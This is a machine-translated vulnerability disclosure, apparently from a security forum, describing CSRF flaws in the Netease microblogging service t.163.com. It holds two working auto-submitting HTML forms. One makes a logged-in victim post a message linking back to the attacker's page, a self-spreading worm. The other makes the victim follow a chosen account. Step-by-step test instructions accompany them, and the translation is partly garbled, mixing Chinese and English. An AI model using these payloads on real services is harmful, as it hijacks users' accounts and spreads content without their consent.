Does not perform token authentication vulnerable to CSRF attacks
A malicious attacker may construct a malicious form, and the defrauded victims of the click, when the victim clicks on the link, on behalf of the victim to produce a microblogging information, this method can produce worms, is very serious.
Test method: 1, The 将 下列 表单 存储 成 index.html put in the local directory,1 8 3. 1 7 4. 3 9. 4 6 replaced with your own ip. <form name="CSRF" method="POST" name="form0" action="http://t.163.com:80/statuses/update.do"> <input type="hidden" name="status" value="http://184.108.40.206/index.html"/> <input type="hidden" name="in_reply_to_status_id" value="sendinfo"/> <input type="hidden" name="dispatchToFollowers" value=""/> </form> <script> document. CSRF. submit(); </script> 2, log on Netease microblogging, 然后访问http://220.127.116.11/index.html 3, the back to own page http://t.163.com/,will be found to have been more of a Twitter message. 4, pay attention to your people if you click on that tweet message, will issue a LIKE microblogging message/
Second, Netease microblogging CSRF exploit 2: automatically add interest, and automatically tweet
Yesterday I put the question to simple, and today tried it, Netease microblogging this CSRF vulnerability can also be automatically added concern. Combined with yesterday that auto-tweet function, the two together will be a very interesting thing. This issue is too serious, I could not help but think as 0day sent out, but in view of national day, you think about it you feel good.
After login, access the constructed form, you can add“small pan head”for attention.
<form method="POST" name="CSRF" action="http://t.163.com:80/friendships/create/3198225089.json"> <input type="hidden" name="name" value="value"/> </form> <script> document. CSRF. submit(); </script>